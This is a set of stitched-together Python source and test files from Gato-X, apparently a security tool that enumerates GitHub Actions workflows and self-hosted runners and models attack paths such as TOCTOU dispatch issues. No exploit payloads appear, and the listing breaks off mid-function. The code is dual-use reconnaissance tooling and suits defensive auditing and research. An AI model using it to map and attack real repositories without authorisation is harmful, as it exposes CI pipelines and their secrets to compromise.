
    def get_attrs(self):
        """
        Get the attributes associated with the ActionNode instance.

        Returns:
            dict: A dictionary containing attributes of the ActionNode instance.
        """
        return {
            self.__class__.__name__: True,
            "type": self.type,
            "is_soft_gate": False,
            "is_hard_gate": False,
        }



class Runner:
    """Wrapper object for a self-hosted runner. Can represent a runner obtained
    via workflow log parsing or administrative query of repo/org level
    self-hosted runners.
    """

    def __init__(
        self,
        runner_name,
        runner_type=None,
        token_permissions=None,
        runner_group=None,
        machine_name=None,
        os=None,
        status=None,
        labels=[],
        non_ephemeral=False,
    ):
        """Constructor for runner wrapper object.

        Args:
            runner_name (str): Name of self-hosted runner.
            machine_name (str, optional): Machine name of runner gathered from
            run logs. Defaults to None.
            os (str, optional): OS of runner. Defaults to None.
            status (str, optional): Status of runner. Defaults to None.
            labels (list, optional): Labels applied to runner. Defaults to [].
        """
        self.runner_name = runner_name
        self.machine_name = machine_name
        self.runner_group = runner_group
        self.runner_type = runner_type
        self.token_permissions = token_permissions
        self.os = os
        self.status = status
        self.labels = labels
        self.non_ephemeral = non_ephemeral

    def toJSON(self):
        """Converts the repository to a Gato JSON representation."""
        representation = {
            "name": self.runner_name,
            "machine_name": self.machine_name if self.machine_name else "Unknown",
            "runner_type": self.runner_type if self.runner_type else "Unknown",
            "runner_group_name": self.runner_group if self.runner_group else "Unknown",
            "token_permissions": self.token_permissions,
            "os": self.os if self.os else "Unknown",
            "status": self.status if self.status else "Unknown",
            "labels": [label for label in self.labels],
            "non_ephemeral": self.non_ephemeral,
        }

        return representation



import asyncio
import pathlib
import os
import pytest
import subprocess

from unittest.mock import AsyncMock, MagicMock, patch, call, ANY, mock_open
from gatox.git.git import Git
from gatox.git.utils import version_check, path_check, sed_check


@patch("gatox.git.utils.subprocess.run")
def test_check_git(mock_run):
    """Test test that the git version check works."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(**{"stdout": "git version 2.38.2\n", "returncode": 0})

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status == "2.38.2"


@patch("gatox.git.utils.subprocess.run")
def test_check_git_fail(mock_run):
    """Test failure case of git version check."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(
        **{"stdout": "command not found: git\n", "returncode": 1}
    )

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status is False


@patch("gatox.git.utils.subprocess.run")
def test_check_git_malformed(mock_run):
    """Test failure case of git version check."""

    mock_stdout = MagicMock()
    mock_stdout.configure_mock(**{"stdout": "git bad!\n", "returncode": 0})

    mock_run.return_value = mock_stdout

    git_status = version_check()
    mock_run.assert_called_once()

    assert git_status is False


@patch("gatox.git.utils.shutil.which")
def test_git_path_check(mock_run):
    """Test checking whether git exists on the path."""

    mock_run.return_value = "/usr/local/bin/git"

    exists = path_check()
    mock_run.assert_called_once()

    assert exists == "/usr/local/bin/git"


@patch("gatox.git.utils.shutil.which")
def test_sed_check(mock_run):
    """Test checking whether sed exists on the path."""
    mock_run.return_value = "/usr/bin/sed"

    exists = sed_check()
    mock_run.assert_called_once()

    assert exists == "/usr/bin/sed"


@patch("gatox.git.utils.shutil.which")
def test_git_path_not_found(mock_run):
    """Test case where git is not on path."""
    mock_run.return_value = None

    exists = path_check()
    mock_run.assert_called_once()

    assert exists is None


def test_constructor():
    """Tests the constructor for the git class."""
    with pytest.raises(ValueError):
        Git(
            "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
            "RepoOnly",
            proxies={"http": "http://proxy", "https": "https://proxy"},
        )


async def test_extract_workflows():
    """Tests extracting workflows from the '.github' folder."""
    curr_path = pathlib.Path(__file__).parent.resolve()

    git = Git("ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "dummy/workflow_test")

    test_repo_path = os.path.join(curr_path, "files/workflow_test")
    ymls = await git.extract_workflow_ymls(repo_path=test_repo_path)

    assert len(ymls) == 1



import pytest
from unittest.mock import MagicMock, patch

from gatox.enumerate.deep_dive.ingest_non_default import IngestNonDefault
from unittest.mock import MagicMock, patch, AsyncMock
import asyncio

from gatox.models.repository import Repository


@pytest.fixture
def mock_repo():
    repo = MagicMock(spec=Repository)
    repo.name = "test/repo"
    return repo


@pytest.fixture
def mock_api():
    api = MagicMock()
    api.pat = "test_pat"
    return api


async def test_ingest_new_api(mock_repo, mock_api):
    IngestNonDefault._tasks = []
    IngestNonDefault._api = None

    task = await IngestNonDefault.ingest(mock_repo, mock_api)

    assert isinstance(task, asyncio.Task)
    assert IngestNonDefault._api == mock_api
    assert len(IngestNonDefault._tasks) == 1
    assert task in IngestNonDefault._tasks


async def test_ingest_existing_api(mock_repo, mock_api):
    IngestNonDefault._tasks = []
    IngestNonDefault._api = mock_api

    task = await IngestNonDefault.ingest(mock_repo, mock_api)

    assert isinstance(task, asyncio.Task)
    assert len(IngestNonDefault._tasks) == 1
    assert task in IngestNonDefault._tasks


@patch("gatox.enumerate.deep_dive.ingest_non_default.Git")
@patch("gatox.enumerate.deep_dive.ingest_non_default.WorkflowGraphBuilder")
async def test_process_repo_empty_workflows(
    mock_builder, mock_git, mock_repo, mock_api
):
    mock_git_instance = AsyncMock()
    mock_git_instance.get_non_default.return_value = []
    mock_git.return_value = mock_git_instance

    IngestNonDefault._api = mock_api
    await IngestNonDefault._process_repo(mock_repo)

    mock_git.assert_called_once_with(mock_api.pat, mock_repo.name)
    mock_git_instance.get_non_default.assert_called_once()
    mock_builder.return_value.build_graph_from_yaml.assert_not_called()


@patch("gatox.enumerate.deep_dive.ingest_non_default.Git")
@patch("gatox.enumerate.deep_dive.ingest_non_default.WorkflowGraphBuilder")
async def test_process_repo_multiple_workflows(
    mock_builder, mock_git, mock_repo, mock_api
):
    mock_workflows = [MagicMock(), MagicMock()]
    mock_git_instance = AsyncMock()
    mock_git_instance.get_non_default.return_value = mock_workflows
    mock_git.return_value = mock_git_instance

    mock_builder_instance = AsyncMock()
    mock_builder.return_value = mock_builder_instance

    IngestNonDefault._api = mock_api
    await IngestNonDefault._process_repo(mock_repo)

    assert mock_builder_instance.build_graph_from_yaml.call_count == 2
    mock_builder_instance.build_graph_from_yaml.assert_any_call(
        mock_workflows[0], mock_repo
    )
    mock_builder_instance.build_graph_from_yaml.assert_any_call(
        mock_workflows[1], mock_repo
    )


async def test_pool_empty_no_tasks():
    IngestNonDefault._tasks = []

    result = await IngestNonDefault.pool_empty()

    assert result is None


async def test_pool_empty_with_tasks():
    IngestNonDefault._tasks = []

    result = await IngestNonDefault.pool_empty()

    assert result is None
    assert len(IngestNonDefault._tasks) == 0


@patch("gatox.enumerate.deep_dive.ingest_non_default.Git")
async def test_process_repo_handles_exception(mock_git, mock_repo, mock_api):
    mock_git_instance = AsyncMock()
    mock_git_instance.get_non_default.side_effect = Exception("Test error")
    mock_git.return_value = mock_git_instance

    IngestNonDefault._api = mock_api

    with pytest.raises(Exception, match="Test error"):
        await IngestNonDefault._process_repo(mock_repo)



from colorama import Fore, Style

GREEN_PLUS = f"{Fore.GREEN}[+]{Style.RESET_ALL}"
GREEN_EXCLAIM = f"{Fore.GREEN}[!]{Style.RESET_ALL}"
YELLOW_DASH = f"{Fore.YELLOW}[-]{Style.RESET_ALL}"
YELLOW_EXCLAIM = f"{Fore.YELLOW}[!]{Style.RESET_ALL}"
RED_DASH = f"{Fore.RED}[-]{Style.RESET_ALL}"
RED_EXCLAIM = f"{Fore.RED}[!]{Style.RESET_ALL}"
BRIGHT_DASH = f"{Style.BRIGHT}-{Style.RESET_ALL}"



import unittest
from unittest.mock import MagicMock
from gatox.enumerate.ingest.ingest import DataIngestor
from gatox.caching.cache_manager import CacheManager


class TestConstructWorkflowCache(unittest.IsolatedAsyncioTestCase):

    def setUp(self):
        self.workflow = MagicMock()
        self.repository = MagicMock()
        CacheManager._instance = None
        self.cache_manager = CacheManager()
        Workflow = MagicMock(return_value=self.workflow)
        Repository = MagicMock(return_value=self.repository)
        self.yml_results = [
            {
                "nameWithOwner": "owner/repo1",
                "object": {
                    "entries": [
                        {
                            "name": "workflow1.yml",
                            "type": "blob",
                            "object": {"text": "content1"},
                        }
                    ]
                },
                "url": "http://example.com/repo1",
                "isPrivate": False,
                "defaultBranchRef": {"name": "main"},
                "isFork": False,
                "stargazers": {"totalCount": 10},
                "pushedAt": "2023-01-01T00:00:00Z",
                "viewerPermission": "ADMIN",
                "isArchived": False,
                "forkingAllowed": True,
                "environments": {"edges": []},
            }
        ]

    async def test_construct_workflow_cache_none(self):
        # Test with None input
        assert await DataIngestor.construct_workflow_cache(None) is None

    async def test_construct_workflow_cache_empty_list(self):
        # Test with empty list input
        await DataIngestor.construct_workflow_cache([])

        assert CacheManager()._instance.repo_wf_lookup == {}
        assert CacheManager()._instance.workflow_cache == {}

    async def test_construct_workflow_cache_valid_input(self):
        # Test with valid input
        await DataIngestor.construct_workflow_cache(self.yml_results)

        assert CacheManager().is_repo_cached("owner/repo1") is True

    async def test_construct_workflow_cache_malformed_data(self):
        # Test with malformed data
        malformed_data = [{"invalid_key": "invalid_value"}]
        await DataIngestor.construct_workflow_cache(malformed_data)

        assert not CacheManager().is_repo_cached("invalid_key")


if __name__ == "__main__":
    unittest.main()



from unittest.mock import patch, MagicMock

from gatox.caching.cache_manager import CacheManager
from gatox.models.repository import Repository
from gatox.models.workflow import Workflow


def test_init_cache():
    """ """
    cache = CacheManager()
    assert cache.workflow_cache == {}


def test_set_workflow():
    """Test setting and retrieving a workflow from the cache."""
    cache = CacheManager()

    mock_wf = MagicMock()

    cache.set_workflow("testOrg/testRepo1", "test.yml", mock_wf)

    assert cache.get_workflow("testOrg/testRepo1", "test.yml") == mock_wf


def test_set_double_workflow():
    """Test setting a workflow twice - this should return the most recent workflow."""
    cache = CacheManager()

    mock_wf = MagicMock()
    mock_wf2 = MagicMock()

    cache.set_workflow("testOrg/testRepo2", "test.yml", mock_wf)
    cache.set_workflow("testOrg/testRepo2", "test.yml", mock_wf2)

    assert cache.get_workflow("testOrg/testRepo2", "test.yml") == mock_wf2


def test_set_empty_and_cached():
    """Test if setting the repo"""
    CacheManager().set_empty("testOrg/testRepoEmpty")

    assert CacheManager().is_repo_cached("testOrg/testRepoEmpty") == True


def test_get_workflows():
    """Test getting all workflows for a repository."""

    cache = CacheManager()

    mock_wf = MagicMock()
    mock_wf2 = MagicMock()

    cache.set_workflow("testOrg/testRepo3", "test.yml", mock_wf)
    cache.set_workflow("testOrg/testRepo3", "test2.yml", mock_wf2)
    wf_set = cache.get_workflows("testOrg/testRepo3")

    assert mock_wf in wf_set
    assert mock_wf2 in wf_set


def test_get_workflows_fail():
    """Test getting all workflows for a repository."""

    cache = CacheManager()

    mock_wf = MagicMock()
    mock_wf2 = MagicMock()

    cache.set_workflow("testOrg/testRepo3", "test.yml", mock_wf)
    cache.set_workflow("testOrg/testRepo3", "test2.yml", mock_wf2)
    assert cache.get_workflows("testOrg/testRepoNone") == set()


def test_set_get_repository():
    """Test setting and getting a repository to the cache."""
    cache = CacheManager()

    mock_repo = MagicMock()
    mock_repo.name = "testOrg/testRepo"

    cache.set_repository(mock_repo)

    assert cache.get_repository("testOrg/testRepo") == mock_repo


def test_get_set_repository_fail():
    """Test failure case when repository does not exist"""
    cache = CacheManager()

    mock_repo = MagicMock()
    mock_repo.name = "testOrg/testRepo"

    cache.set_repository(mock_repo)

    assert cache.get_repository("badOrg/BadRepo") == None


def test_set_get_action():
    """Test setting and getting a reusable action."""
    cache = CacheManager()

    mock_action = "someActionContentsHere"

    cache.set_action(
        "testOrg/testRepo", ".github/actions/action.yml", "main", mock_action
    )

    assert (
        cache.get_action("testOrg/testRepo", ".github/actions/action.yml", "main")
        == mock_action
    )



import httpx
import logging
import json
import asyncio
from typing import List

from gatox.configuration.configuration_manager import ConfigurationManager

logger = logging.getLogger(__name__)


async def send_slack_webhook(message: str) -> None:
    """Send a message to configured Slack webhooks asynchronously.

    Args:
        message: The message to send to Slack

    Raises:
        ValueError: If the request to Slack fails after retries
    """
    payload = {"text": json.dumps(message, indent=4)}
    hooks: List[str] = ConfigurationManager().NOTIFICATIONS["SLACK_WEBHOOKS"]

    async with httpx.AsyncClient(
        http2=True, follow_redirects=True, timeout=10.0
    ) as client:
        for webhook in hooks:
            attempt = 0
            while attempt < 3:
                try:
                    response = await client.post(webhook, json=payload)
                    break  # Success; exit the retry loop.
                except httpx.ConnectError as e:
                    attempt += 1
                    logging.warning(
                        f"Connection error sending webhook, retrying! Attempt {attempt}/3"
                    )
                    await asyncio.sleep(1)
            else:
                # All attempts failed.
                raise ValueError(
                    "Failed to send webhook due to connection errors after 3 attempts."
                )

            if response.status_code != 200:
                raise ValueError(
                    "Request to slack returned an error %s, the response is:\n%s"
                    % (response.status_code, response.text)
                )



import httpx
import os
import sys

reg_pat = os.environ.get("SH_RUNNER_MANAGE_TOKEN")
dispatch_pat = os.environ.get("WF_DISPATCH_TOKEN")
run_ref = os.environ.get("RUN_REF")


# Quick helper script for integration tests to get add/remove tokens.
if sys.argv[1] == "remove":

    headers = {
        "Accept": "application/vnd.github+json",
        "Authorization": f"Bearer {reg_pat}",
        "X-GitHub-Api-Version": "2022-11-28",
    }

    response = httpx.post(
        "https://api.github.com/orgs/gatoxtest/actions/runners/remove-token",
        headers=headers,
    )
    if response.status_code == 201:
        token = response.json()["token"]
        command = f"./config.sh remove --token {token} --name ghrunner-test"
        os.system(command)
elif sys.argv[1] == "register":

    headers = {
        "Accept": "application/vnd.github+json",
        "Authorization": f"Bearer {reg_pat}",
        "X-GitHub-Api-Version": "2022-11-28",
    }

    response = httpx.post(
        "https://api.github.com/orgs/gatoxtest/actions/runners/registration-token",
        headers=headers,
    )

    if response.status_code == 201:
        token = response.json()["token"]
        command = f"./config.sh --url https://github.com/gatoxtest --unattended --token {token} --name ghrunner-test"
        os.system(command)
elif sys.argv[1] == "dispatch":

    headers = {
        "Accept": "application/vnd.github+json",
        "Authorization": f"Bearer {dispatch_pat}",
        "X-GitHub-Api-Version": "2022-11-28",
    }

    data = {"ref": run_ref}

    response = httpx.post(
        "https://api.github.com/repos/AdnaneKhan/gato-x/actions/workflows/integration_sh.yaml/dispatches",
        headers=headers,
        json=data,
    )

    if response.status_code == 204:
        exit(0)
    else:
        exit(1)
elif sys.argv[1] == "force_remove":
    headers = {
        "Accept": "application/vnd.github+json",
        "Authorization": f"Bearer {reg_pat}",
        "X-GitHub-Api-Version": "2022-11-28",
    }

    response = httpx.get(
        "https://api.github.com/orgs/gatoxtest/actions/runners",
        headers=headers,
    )

    if response.status_code == 200:
        runner_info = response.json()

        runner = [
            runner
            for runner in runner_info["runners"]
            if runner["name"] == "ghrunner-test"
        ]

        if runner:
            remove_id = runner[0]["id"]
            resp = httpx.delete(
                f"https://api.github.com/orgs/gatoxtest/actions/runners/{remove_id}",
                headers=headers,
            )

            if resp.status_code == 204:
                exit(0)
            else:
                exit(1)



import re


# From https://stackoverflow.com/questions/14693701/
# how-can-i-remove-the-ansi-escape-sequences-from-a-string-in-python
def escape_ansi(line):
    ansi_escape = re.compile(
        r"(?:\x1B[@-_]|[\x80-\x9F])[0-?]*[ -/]*[@-~]", re.MULTILINE
    )
    return ansi_escape.sub("", line)



from functools import reduce


class GqlQueries:
    """Constructs graphql queries for use with the GitHub GraphQL api."""

    GET_YMLS_WITH_SLUGS = """
    fragment repoWorkflows on Repository {
        nameWithOwner
        stargazers {
            totalCount
        }
        isPrivate
        isArchived
        viewerPermission
        forkingAllowed
        url
        isFork
        pushedAt
        defaultBranchRef {
            name
        }
        object(expression: "HEAD:.github/workflows/") {
            ... on Tree {
                entries {
                    name
                    type
                    mode
                    object {
                        ... on Blob {
                            byteSize
                            text
                        }
                    }
                }
            }
        }
    }
    """

    GET_YMLS = """
    query RepoFiles($node_ids: [ID!]!) {
        nodes(ids: $node_ids) {
            ... on Repository {
                nameWithOwner
                isPrivate
                isArchived
                forkingAllowed
                stargazers {
                    totalCount
                }
                viewerPermission
                pushedAt
                url
                isFork
                defaultBranchRef {
                    name
                }
                object(expression: "HEAD:.github/workflows/") {
                    ... on Tree {
                        entries {
                            name
                            type
                            mode
                            object {
                                ... on Blob {
                                    byteSize
                                    text
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    """

    GET_YMLS_ENV = """
        query RepoFiles($node_ids: [ID!]!) {
            nodes(ids: $node_ids) {
                ... on Repository {
                    nameWithOwner
                    isPrivate
                    isArchived
                    forkingAllowed
                    stargazers {
                        totalCount
                    }
                    viewerPermission
                    pushedAt
                    url
                    isFork
                    environments(first: 100) {
                        edges {
                        node {
                            id
                            name
                        }
                    }
                    }
                    defaultBranchRef {
                        name
                    }
                    object(expression: "HEAD:.github/workflows/") {
                        ... on Tree {
                            entries {
                                name
                                type
                                mode
                                object {
                                    ... on Blob {
                                        byteSize
                                        text
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    """

    GET_ORG_REPOS = """
        query($orgName: String!, $repoTypes: RepositoryPrivacy!, $cursor: String) {
            organization(login: $orgName) {
                repositories(first: 100, privacy: $repoTypes, after: $cursor) {
                edges {
                    node {
                    name
                    }
                    cursor
                }
                pageInfo {
                    endCursor
                    hasNextPage
                }
                }
            }
            }
    """

    GET_PR_MERGED = """
    query associatedPRs($sha: String, $repo: String!, $owner: String!){
            repository(name: $repo, owner: $owner) {
                commit: object(expression: $sha) {
                ... on Commit {
                    associatedPullRequests(first:1){
                    edges{
                        node{
                        merged
                        mergedAt
                        }
                    }
                    }
                }
                }
            }
    }
    """

    @staticmethod
    def get_workflow_ymls_from_list(repos: list):
        """
        Constructs a list of GraphQL queries to fetch workflow YAML
        files from a list of repositories.

        This method splits the list of repositories into chunks of
        up to 100 repositories each, and constructs a separate
        GraphQL query for each chunk. Each query fetches the workflow
        YAML files from the repositories in one chunk.

        Args:
            repos (list): A list of repository slugs, where each
            slug is a string in the format "owner/name".

        Returns:
            list: A list of dictionaries, where each dictionary
            contains a single GraphQL query in the format:
            {"query": "<GraphQL query string>"}.
        """

        queries = []

        for i in range(0, len(repos), 50):
            chunk = repos[i : i + 50]
            repo_queries = []

            for j, repo in enumerate(chunk):
                owner, name = repo.split("/")
                repo_query = f"""
                repo{j + 1}: repository(owner: "{owner}", name: "{name}") {{
                    ...repoWorkflows
                }}
                """
                repo_queries.append(repo_query)

            queries.append(
                {
                    "query": GqlQueries.GET_YMLS_WITH_SLUGS
                    + "{\n"
                    + "\n".join(repo_queries)
                    + "\n}"
                }
            )

        return queries

    @staticmethod
    def get_workflow_ymls(repos: list):
        """Retrieve workflow yml files for each repository.

        Args:
            repos (List[Repository]): List of repository objects
        Returns:
            (list): List of JSON post parameters for each graphQL query.
        """
        queries = []

        if len(repos) == 0:
            return queries

        for i in range(0, (len(repos) // 100) + 1):

            top_len = len(repos) if len(repos) < 100 * (i + 1) else 100 * (i + 1)
            # Use reduce to accumulate node_ids and can_push in a single iteration
            node_ids, can_push = reduce(
                lambda acc, repo: (
                    acc[0] + [repo.repo_data["node_id"]],
                    acc[1] or repo.can_push(),
                ),
                repos[100 * i : top_len],
                ([], False),
            )

            query = {
                # We list envs if we have write access to one in the set (for secrets
                # reasons, otherwise we don't list them)
                "query": (GqlQueries.GET_YMLS_ENV if can_push else GqlQueries.GET_YMLS),
                "variables": {"node_ids": node_ids},
            }

            queries.append(query)
        return queries



import unittest
from unittest.mock import Mock

from gatox.enumerate.results.dispatch_toctou_result import DispatchTOCTOUResult
from gatox.enumerate.results.confidence import Confidence
from gatox.enumerate.results.complexity import Complexity


class TestDispatchTOCTOUResult(unittest.TestCase):
    def setUp(self):
        """Set up test fixtures before each test method."""
        # Mock nodes for the attack path
        self.start_node = Mock()
        self.start_node.repo_name.return_value = "test/repository"
        self.start_node.get_workflow_name.return_value = "workflow.yml"
        self.start_node.get_triggers.return_value = [
            "workflow_dispatch",
            "repository_dispatch",
        ]

        self.end_node = Mock()
        self.end_node.get_step_data.return_value = {
            "uses": "actions/checkout@v3",
            "with": {"ref": "main"},
        }

        self.path = [self.start_node, self.end_node]

        # Create test instance
        self.result = DispatchTOCTOUResult(
            path=self.path,
            confidence_score=Confidence.HIGH,
            attack_complexity_score=Complexity.TOCTOU,
        )

    def test_initialization(self):
        """Test proper initialization of DispatchTOCTOUResult."""
        self.assertEqual(self.result.repo_name(), "test/repository")
        self.assertEqual(self.result.issue_type(), "DispatchTOCTOUResult")
        self.assertEqual(self.result.confidence_score(), Confidence.HIGH)
        self.assertEqual(self.result.attack_complexity(), Complexity.TOCTOU)

    def test_hash_consistency(self):
        """Test that hash generation is consistent for same inputs."""
        hash1 = self.result.get_first_and_last_hash()
        hash2 = self.result.get_first_and_last_hash()
        self.assertEqual(hash1, hash2)

    def test_hash_uniqueness(self):
        """Test that different inputs produce different hashes."""
        # Create result with different confidence
        different_result = DispatchTOCTOUResult(
            path=self.path,
            confidence_score=Confidence.LOW,
            attack_complexity_score=Complexity.TOCTOU,
        )

        self.assertNotEqual(
            self.result.get_first_and_last_hash(),
            different_result.get_first_and_last_hash(),
        )

    def test_to_machine_high_confidence(self):
        """Test machine output format with high confidence."""
        output = self.result.to_machine()

        self.assertEqual(output["repository_name"], "test/repository")
        self.assertEqual(output["issue_type"], "DispatchTOCTOUResult")
        self.assertEqual(output["initial_workflow"], "workflow.yml")
        self.assertEqual(output["confidence"], Confidence.HIGH)
        self.assertEqual(output["attack_complexity"], Complexity.TOCTOU)
        self.assertEqual(output["sink"], self.end_node.get_step_data())
        self.assertEqual(
            output["triggers"], ["workflow_dispatch", "repository_dispatch"]
        )

    def test_to_machine_low_confidence(self):
        """Test machine output format with low confidence."""
        result = DispatchTOCTOUResult(
            path=self.path,
            confidence_score=Confidence.LOW,
            attack_complexity_score=Complexity.TOCTOU,
        )

        output = result.to_machine()
        self.assertEqual(output["sink"], "Not Detected")

    def test_to_machine_required_fields(self):
        """Test that all required fields are present in machine output."""
        output = self.result.to_machine()
        required_fields = {
            "repository_name",
            "issue_type",
            "triggers",
            "initial_workflow",
            "confidence",
            "attack_complexity",
            "explanation",
            "path",
            "sink",
        }

        self.assertEqual(set(output.keys()), required_fields)


if __name__ == "__main__":
    unittest.main()



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging
import traceback

logger = logging.getLogger(__name__)

from gatox.models.workflow import Workflow
from gatox.models.repository import Repository
from gatox.models.composite import Composite
from gatox.workflow_graph.node_factory import NodeFactory
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_graph.nodes.job import JobNode
from gatox.workflow_graph.nodes.action import ActionNode
from gatox.workflow_graph.nodes.workflow import WorkflowNode
from gatox.caching.cache_manager import CacheManager


class WorkflowGraphBuilder:
    _instance = None

    def __new__(cls):
        """
        Create a new instance of the class. If an instance already exists, return that instance.
        """
        if cls._instance is None:
            cls._instance = super(WorkflowGraphBuilder, cls).__new__(cls)
            cls._instance.graph = TaggedGraph(cls._instance)

        return cls._instance

    def build_lone_repo_graph(self, repo_wrapper: Repository):
        """
        Build a graph node for a repository that has no workflows.
        """
        repo, added = NodeFactory.create_repo_node(repo_wrapper)
        if added:
            self.graph.add_node(repo, **repo.get_attrs())

    def add_callee_job(
        self, workflow_wrapper: Workflow, callee: str, job_def: dict, job_node: JobNode
    ):
        """
        Adds a reference to a called workflow (reusable workflow)
        """
        if not job_def or not job_node:
            return

        callee_node = NodeFactory.create_called_workflow_node(
            callee, workflow_wrapper.branch, workflow_wrapper.repo_name
        )

        callee_node.add_caller_reference(job_node)

        if not callee_node in self.graph.nodes:
            self.graph.add_node(callee_node, **callee_node.get_attrs())
        self.graph.add_edge(job_node, callee_node, relation="uses")

    async def _initialize_action_node(self, node: ActionNode, api):
        """
        Initialize an ActionNode by retrieving and parsing its contents.

        Args:
            node (ActionNode): The action node to initialize.
            api (object): The API client used to retrieve raw action contents.
        """
        action_metadata = node.action_info
        node.initialized = True

        async def get_action_contents(repo, path, ref):
            """
            Retrieve and cache the action contents.

            Args:
                repo (str): The repository name.
                path (str): The path to the action file.
                ref (str): The reference (e.g., branch or tag).

            Returns:
                str: The contents of the action file.
            """
            contents = CacheManager().get_action(repo, path, ref)
            if not contents:
                contents = await api.retrieve_raw_action(repo, path, ref)
                if contents:
                    CacheManager().set_action(repo, path, ref, contents)
            return contents

        ref = node.caller_ref if action_metadata["local"] else action_metadata["ref"]
        contents = await get_action_contents(
            action_metadata["repo"], action_metadata["path"], ref
        )

        if not contents:
            return False

        parsed_action = Composite(contents)
        if parsed_action.composite:
            steps = parsed_action.parsed_yml["runs"].get("steps", [])
            if type(steps) != list:
                raise ValueError("Steps must be a list")

            prev_step_node = None
            for iter, step in enumerate(steps):
                calling_name = parsed_action.parsed_yml.get("name", f"EMPTY")
                step_node = NodeFactory.create_step_node(
                    step,
                    ref,
                    action_metadata["repo"],
                    action_metadata["path"],
                    calling_name,
                    iter,
                )

                self.graph.add_node(step_node, **step_node.get_attrs())

                # Steps are sequential, so for reachability checks
                # the job only "contains" the first step.
                if prev_step_node:
                    self.graph.add_edge(prev_step_node, step_node, relation="next")
                    prev_step_node = step_node
                else:
                    self.graph.add_edge(node, step_node, relation="contains")

    async def _initialize_callee_node(self, workflow: WorkflowNode, api):
        """Initialize a callee workflow with the workflow yaml"""
        if "uninitialized" in workflow.get_tags():
            slug, ref, path = workflow.get_parts()
            callee_wf = CacheManager().get_workflow(slug, f"{path}:{ref}")
            if not callee_wf:
                callee_wf = await api.retrieve_repo_file(slug, path, ref)
                if callee_wf:
                    CacheManager().set_workflow(slug, f"{path}:{ref}", callee_wf)
                else:
                    return

            if callee_wf and not callee_wf.isInvalid():
                workflow.initialize(callee_wf)
            else:
                raise ValueError("Invalid callee workflow!")

            self.graph.remove_tags_from_node(workflow, ["uninitialized"])

            await self.build_workflow_jobs(callee_wf, workflow)

    def __transform_list_job(self, jobs: list):
        """Transforms a list job into a dictionary job."""
        jobs_dict = {}
        for job in jobs:
            if not type(job) == dict:
                raise ValueError("Job must be a dictionary")
            if "name" not in job:
                raise ValueError("Job in list format must have a name field")
            name = job.pop("name")  # Remove name field and use as key
            jobs_dict[name] = job
        jobs = jobs_dict

        return jobs

    async def build_graph_from_yaml(
        self, workflow_wrapper: Workflow, repo_wrapper: Repository
    ):
        """
        Build a graph from a workflow yaml file.
        """
        if workflow_wrapper.isInvalid() or not repo_wrapper:
            return False

        repo, added = NodeFactory.create_repo_node(repo_wrapper)
        if added:
            self.graph.add_node(repo, **repo.get_attrs())
        try:
            wf_node = NodeFactory.create_workflow_node(
                workflow_wrapper,
                workflow_wrapper.branch,
                workflow_wrapper.repo_name,
                workflow_wrapper.getPath(),
            )
            if not "uninitialized" in wf_node.get_tags():
                self.graph.remove_tags_from_node(wf_node, "uninitialized")

            self.graph.add_node(wf_node, **wf_node.get_attrs())
            self.graph.add_edge(repo, wf_node, relation="contains")
            await self.build_workflow_jobs(workflow_wrapper, wf_node)

            return True
        except ValueError as e:
            logger.warning(
                f"Error building graph from workflow, likely syntax error: {workflow_wrapper.getPath()}, {repo_wrapper.name}"
            )
            # Likely encountered a syntax error in the workflow
            return False
        except Exception as e:
            logger.error(
                f"Exception building graph from workflow, likely Gato-X bug: {workflow_wrapper.getPath()}"
            )
            logger.error(str(e))
            logger.error(traceback.format_exc())
            # Likely gato-x bug
            return False

    async def build_workflow_jobs(
        self, workflow_wrapper: Workflow, wf_node: WorkflowNode
    ):
        """Build workflow jobs from the parsed yaml file."""
        workflow = workflow_wrapper.parsed_yml
        jobs = workflow.get("jobs", {})
        if not jobs:
            raise ValueError(
                f"No jobs found in workflow: {workflow_wrapper.workflow_name}"
            )

        if isinstance(jobs, list):
            jobs = self.__transform_list_job(jobs)

        for job_name, job_def in jobs.items():

            if not job_def:
                # This means there is a syntax error
                # in the workflow. Gato-X cannot process
                # malformed workflows.
                raise ValueError("Job definition is empty")

            job_node = NodeFactory.create_job_node(
                job_name,
                workflow_wrapper.branch,
                workflow_wrapper.repo_name,
                workflow_wrapper.getPath(),
            )
            job_node.populate(job_def, wf_node)
            self.graph.add_node(job_node, **job_node.get_attrs())

            # Handle called workflows
            callee = job_def.get("uses", None)
            if callee:
                self.add_callee_job(workflow_wrapper, callee, job_def, job_node)

            needs = job_def.get("needs", [])
            # If single entry then set as array
            if type(needs) == str:
                needs = [needs]
            prev_node = None
            for i, need in enumerate(needs):
                need_node = NodeFactory.create_job_node(
                    need,
                    workflow_wrapper.branch,
                    workflow_wrapper.repo_name,
                    workflow_wrapper.getPath(),
                    needs,
                )
                job_node.add_needs(need_node)
                self.graph.add_node(need_node, **need_node.get_attrs())

                # Add an extra dependency so subsequent needs depend on the previous one
                if i > 0:
                    self.graph.add_edge(prev_node, need_node, relation="extra_depends")
                self.graph.add_edge(need_node, job_node, relation="depends")
                prev_node = need_node

            if not needs:
                self.graph.add_edge(wf_node, job_node, relation="contains")

            # Handle steps
            steps = job_def.get("steps", [])
            prev_step_node = None
            for iter, step in enumerate(steps):
                step_node = NodeFactory.create_step_node(
                    step,
                    workflow_wrapper.branch,
                    workflow_wrapper.repo_name,
                    workflow_wrapper.getPath(),
                    job_name,
                    iter,
                )

                self.graph.add_node(step_node, **step_node.get_attrs())

                # Steps are sequential, so for reachability checks
                # the job only "contains" the first step.
                if prev_step_node:
                    self.graph.add_edge(prev_step_node, step_node, relation="next")
                else:
